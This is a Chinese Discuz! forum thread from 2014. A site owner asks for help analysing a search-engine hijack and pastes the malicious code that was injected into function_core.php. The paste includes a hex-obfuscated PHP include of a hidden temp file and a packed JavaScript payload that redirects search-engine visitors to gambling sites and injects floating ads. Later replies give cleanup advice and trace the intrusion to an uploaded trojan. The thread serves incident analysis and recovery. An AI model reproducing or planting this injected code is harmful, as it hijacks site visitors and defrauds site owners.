Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[已解决] 牛逼的搜索引擎劫持,function_core.php文件

[复制链接]
 楼主| dusongqiang 发表于 2014-5-9 18:00:58 | 显示全部楼层
INCLUDE(pack('H*','633a5c77696e646f77735c74656d705c2e53595344554d505c2e576830416d492e434f5245'));

谁帮我分析一下这个 还有:http://api.discuz.com.de/Seo.js

JS内容是:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d(3.N.Q(\'f\')==-1){e k=1b 1a();k.19(k.1c()+8);3.N=\'f=1;1d=\'+k.18();e U=3.1g;e G=[\'12\',\'11\',\'13\',\'17\',\'16\',\'15\',\'14.1e\',\'E.5\',\'1m\',\'1p\'];1h(e i 1o G){d(U.Q(G)!=-1){d(P.F.R){P.F.R.S=\'4://b.X.E/\'};F.S.j=\'4://b.t.5/6/H.6?n=1\'}}}1i{3.O("<A V=\'g\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.t.5/6/1j.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");3.O("<A V=\'h\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/h-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.X.E/\' p=\'q\'><r s=\'4://u.l.5.o/m/h-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");1r f(){d(!3.1q){e 7=3.D.W;d(7==0){7=3.z.W};3.B(\'g\').9.7=7+i+\'y\';3.B(\'g\').9.1n=3.D.Z+8+\'y\';3.B(\'h\').9.7=7+i+\'y\';3.B(\'h\').9.1k=3.D.Z+8+\'y\'};1l(\'f();\',1f)};f()}',62,90,'|||document|http|com|html|top||style|130|www|height|if|var|whoami|Left|Right||href|exp|discuz|Img|pid|de|target|_blank|img|src|888hy|api|gif|br|width|px||div|getElementById|border|body|so|window|bot|livedealer|absolute|index|visibility|position|visible|cookie|write|parent|indexOf|opener|location|999|ref|id|scrollTop|v587|240|scrollLeft|line|google|baidu|yahoo|360|sogou|soso|bing|toGMTString|setTime|Date|new|getTime|expires|cn|200|referrer|for|else|register|right|setTimeout|youdao|left|in|anquan|ns|function'.split('|'),0,{}));

回复

使用道具 举报

 楼主| dusongqiang 发表于 2014-5-10 13:31:58 | 显示全部楼层
求高手解决
回复

使用道具 举报

 楼主| dusongqiang 发表于 2014-5-16 11:46:35 | 显示全部楼层
继续找高手解决
回复

使用道具 举报

yimingnet 发表于 2014-5-24 14:10:41 | 显示全部楼层
我的也被劫持,不知道怎么删 。
回复

使用道具 举报

McVed 发表于 2014-5-24 14:32:57 | 显示全部楼层
环境要重新配置,然后原有文件一个不留,附件什么的可以留,然后原程序覆盖(一定要清干净再覆盖)。看起来麻烦但是这是治本的方案
回复

使用道具 举报

飘渺的蜘蛛 发表于 2014-5-27 14:18:34 | 显示全部楼层
非常感谢楼主分享这个经历,我今天发现了同样的问题,自己访问正常,但搜索快照都是bocai的,找了半天也没发现原因。
我通过文件校验发现function_core.php在23日被修改,但我的技术比楼主还差多了,没有找到具体修改的地方。
看了楼主的帖子,终于找到了,删除了那一段,百度蜘蛛抓取正常了,非常感谢楼主。
不知道具体是什么原因被修改的,我这段时间论坛被人匿名发帖,就是纯ip发帖,我可以肯定所有匿名发帖肯定关了的,不知道这个漏洞具体在哪里。
假如楼主找到了漏洞原因,麻烦分享下啊,感谢。
回复

使用道具 举报

飘渺的蜘蛛 发表于 2014-6-3 11:00:38 | 显示全部楼层

我通过分析日志,找到了漏洞原因,是因为utility文件夹未删除导致被黑客利用!在这个文件夹里面上传了木马文件。
这个插件包直接删除就行了
discuz的文件校验不会检查utility文件夹。
你可以看下你的是否同样的原因
回复

使用道具 举报

威顺客 发表于 2014-6-6 01:22:48 | 显示全部楼层
飘渺的蜘蛛 发表于 2014-6-3 11:00
我通过分析日志,找到了漏洞原因,是因为utility文件夹未删除导致被黑客利用!在这个文件夹里面上传了木 ...

多谢分享哈
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-23 03:04 , Processed in 0.028421 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表